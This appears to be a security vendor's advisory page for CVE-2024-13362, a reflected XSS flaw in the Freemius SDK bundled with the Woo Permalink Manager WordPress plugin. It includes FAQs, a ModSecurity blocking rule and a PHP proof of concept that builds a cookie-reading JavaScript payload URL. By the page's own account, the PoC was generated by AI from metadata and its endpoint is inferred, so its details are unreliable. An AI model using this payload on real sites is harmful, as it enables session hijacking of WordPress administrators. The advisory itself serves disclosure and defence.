What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK used in the Woo Permalink Manager plugin for WordPress. It allows unauthenticated attackers to inject arbitrary JavaScript via the ‘url’ parameter due to insufficient input sanitization.

Who is affected by this vulnerability?

Any WordPress site using the Woo Permalink Manager plugin version 2.3.11 or earlier is potentially affected by CVE-2024-13362. Administrators should check their installed plugins for this version to determine if they are at risk.

How does the vulnerability work?

The vulnerability works by allowing attackers to craft malicious links that include a harmful script in the ‘url’ parameter. When a user clicks the link, the script executes in the context of the user’s session, potentially leading to session hijacking or unauthorized actions.

What does the CVSS score of 6.1 signify?

The CVSS score of 6.1 indicates a medium severity level for this vulnerability. This means that while it is not the most critical threat, it still poses a significant risk that could lead to serious consequences if exploited.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Woo Permalink Manager plugin installed. If it is version 2.3.11 or earlier, your site is at risk and should be addressed immediately.

What are the recommended mitigation steps?

To mitigate the risk, it is recommended to disable or replace the Woo Permalink Manager plugin until a patched version is released. Additionally, ensure that all user input is properly sanitized and escaped in your applications.

How does the proof of concept illustrate the vulnerability?

The proof of concept demonstrates the vulnerability by constructing a malicious URL that exploits the ‘url’ parameter to execute an XSS payload. This showcases how an attacker can trick users into executing harmful scripts.

What should I do if I have already been attacked?

If you suspect that your site has been compromised, take immediate action to secure it. Change passwords, review user accounts for unauthorized changes, and consult security professionals for a thorough investigation.

Is there a patch available for this vulnerability?

As of now, there is no patched version available for the Woo Permalink Manager plugin. Users should monitor the plugin’s updates for any future releases that address this vulnerability.

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. It can lead to various attacks, including data theft and session hijacking.

How can I protect my WordPress site from future vulnerabilities?

To protect your WordPress site, keep all plugins and themes updated, use security plugins, regularly back up your site, and follow best practices for user input validation and output escaping.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 9, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (woo-permalink-manager)

Q: What is the risk of exploitation?

If exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s WordPress admin session. This could lead to session hijacking, phishing attempts, or unauthorized administrative actions.

CVE ID CVE-2024-13362

Plugin woo-permalink-manager

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.3.11

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This is a reflected DOM-based cross-site scripting (XSS) vulnerability in the Freemius SDK (version 2.10.1 and below) as used by the WordPress plugin Woo Permalink Manager (slug: woo-permalink-manager, vulnerable version 2.3.11). An unauthenticated attacker can inject arbitrary JavaScript via the ‘url’ parameter, with CVSS 6.1 (Medium).

The root cause is insufficient input sanitization and output escaping on the ‘url’ parameter within the Freemius SDK’s modal or redirect logic. Based on the CWE-79 classification and the description, the vulnerability is likely triggered when the SDK renders a URL passed by the attacker without proper encoding. This is an inferred conclusion, as no source code diff is available.

To exploit this, an attacker crafts a malicious link containing a ‘url’ parameter with an XSS payload like ‘javascript:alert(1)’ or an encoded event handler. The attacker then tricks a logged-in administrator or other user into clicking that link. The vulnerable component (e.g., an admin modal or redirect page) reflects the payload in the DOM, executing the script in the victim’s session context.

For remediation, the Freemius SDK must validate the ‘url’ parameter against an allowed whitelist (e.g., only {plugin_uri} or admin-relative paths) and escape all output with functions like esc_url() or wp_kses() before rendering in the DOM. Since the vulnerable plugin has no patched version available, users should disable or replace the plugin until an update is provided.

If exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s WordPress admin session. This could lead to session hijacking, phishing (e.g., fake update prompts), or unauthorized administrative actions (e.g., adding rogue users). The attack does not require authentication, but does require user interaction (clicking the malicious link).

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected XSS via url parameter in Freemius SDK AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,
   msg:'CVE-2024-13362 Reflected XSS via url parameter (Freemius SDK)',
   severity:'CRITICAL',
   tag:'CVE-2024-13362',
   tag:'wordpress',
   tag:'xss'"
  SecRule ARGS_GET:action "@streq freemius_check_url" "chain"
    SecRule ARGS_GET:url "@rx (?:javascript|vbscript|data):" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

/**
 * This PoC demonstrates a reflected XSS attack via the 'url' parameter
 * in the Freemius SDK (used by Woo Permalink Manager).
 * It constructs a malicious link and outputs it for testing.
 * Assumes the vulnerable component is accessible via admin-ajax.php
 * or a direct Freemius endpoint hooking into the admin area.
 */

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress site URL
$action = 'freemius_check_url';     // Inferred AJAX action (common Freemius pattern)
$xss_payload = 'javascript:alert(document.cookie)'; // XSS payload

// Build the malicious URL with the XSS payload in the 'url' parameter
$malicious_url = sprintf(
    '%s/wp-admin/admin-ajax.php?action=%s&url=%s',
    rtrim($target_url, '/'),
    urlencode($action),
    urlencode($xss_payload)
);

echo "[+] XSS Exploit URL (click link if authenticated):n";
echo $malicious_url . "nn";

// Optional: Send the crafted request to verify the reflection (requires admin session)
// Uncomment below to test (note: this may trigger stored XSS or non-reflected output)

// $ch = curl_init();
// curl_setopt($ch, CURLOPT_URL, $malicious_url);
// curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// curl_setopt($ch, CURLOPT_COOKIE, session_name() . '=' . session_id()); // Provide a valid admin session cookie
// $response = curl_exec($ch);
// curl_close($ch);
// echo "[+] Response content (check for payload reflection):n" . substr($response, 0, 2000) . "n";

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK used in the Woo Permalink Manager plugin for WordPress. It allows unauthenticated attackers to inject arbitrary JavaScript via the ‘url’ parameter due to insufficient input sanitization.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Woo Permalink Manager plugin version 2.3.11 or earlier is potentially affected by CVE-2024-13362. Administrators should check their installed plugins for this version to determine if they are at risk.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability works by allowing attackers to craft malicious links that include a harmful script in the ‘url’ parameter. When a user clicks the link, the script executes in the context of the user’s session, potentially leading to session hijacking or unauthorized actions.
What does the CVSS score of 6.1 signify?
Understanding the severity rating
The CVSS score of 6.1 indicates a medium severity level for this vulnerability. This means that while it is not the most critical threat, it still poses a significant risk that could lead to serious consequences if exploited.
How can I check if my site is vulnerable?
Verification steps for administrators
To check if your site is vulnerable, verify the version of the Woo Permalink Manager plugin installed. If it is version 2.3.11 or earlier, your site is at risk and should be addressed immediately.
What are the recommended mitigation steps?
Actions to take for protection
To mitigate the risk, it is recommended to disable or replace the Woo Permalink Manager plugin until a patched version is released. Additionally, ensure that all user input is properly sanitized and escaped in your applications.
What is the risk of exploitation?
Potential consequences of an attack
If exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s WordPress admin session. This could lead to session hijacking, phishing attempts, or unauthorized administrative actions.
How does the proof of concept illustrate the vulnerability?
Understanding the demonstration
The proof of concept demonstrates the vulnerability by constructing a malicious URL that exploits the ‘url’ parameter to execute an XSS payload. This showcases how an attacker can trick users into executing harmful scripts.
What should I do if I have already been attacked?
Response to a successful exploitation
If you suspect that your site has been compromised, take immediate action to secure it. Change passwords, review user accounts for unauthorized changes, and consult security professionals for a thorough investigation.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patched version available for the Woo Permalink Manager plugin. Users should monitor the plugin’s updates for any future releases that address this vulnerability.
What is Cross-Site Scripting (XSS)?
Basic definition of the attack type
Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. It can lead to various attacks, including data theft and session hijacking.
How can I protect my WordPress site from future vulnerabilities?
Best practices for security
To protect your WordPress site, keep all plugins and themes updated, use security plugins, regularly back up your site, and follow best practices for user input validation and output escaping.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations